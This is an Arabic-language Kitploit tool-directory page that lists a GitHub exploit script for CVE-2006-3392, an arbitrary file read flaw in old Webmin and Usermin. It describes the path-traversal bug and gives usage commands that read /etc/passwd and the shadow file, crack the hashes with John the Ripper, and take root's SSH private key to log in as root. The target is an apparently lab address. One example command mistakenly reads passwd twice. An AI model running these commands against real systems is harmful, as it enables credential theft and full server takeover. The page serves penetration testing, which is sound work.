Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2006-3392 — Webmin < 1.290 / Usermin < 1.220 - الإفصاح التعسفي عن الملفات | Kitploit
أدوات/GitHubGitHub/g1vi/cve-2006-3392
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubg1vi/cve-2006-3392

CVE-2006-3392

Webmin < 1.290 / Usermin < 1.220 - الإفصاح التعسفي عن الملفات

عرض المستودع
12منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2006-3392

https://www.cvedetails.com/cve/CVE-2006-3392/

تستدعي Webmin قبل الإصدار 1.290 وUsermin قبل الإصدار 1.220 دالة simplify_path قبل فك ترميز HTML، مما يسمح للمهاجمين عن بُعد بقراءة ملفات عشوائية، كما هو موضح باستخدام تسلسلات "..%01"، التي تتجاوز إزالة تسلسلات "../" قبل إزالة وحدات البايت مثل "%01" من اسم الملف. ملاحظة: هذه مشكلة مختلفة عن CVE-2006-3274.

الاستخدام

تصفح أي ملف في نظام الملفات بامتيازات الجذر

root@kitploit:~
./exploit.sh <target ip> <target port> <file to disclose>

أمثلة

تصفح ملفي passwd وshadow على 10.10.11.105، ثم قم بفك الدمج وكسر التجزئات

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed

تصفح مفتاح RSA الخاص على 10.10.11.105

root@kitploit:~
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]

الترخيص

لا تتردد في الاستخدام أو التعديل متى وأينما تشاء

تنزيل الأداة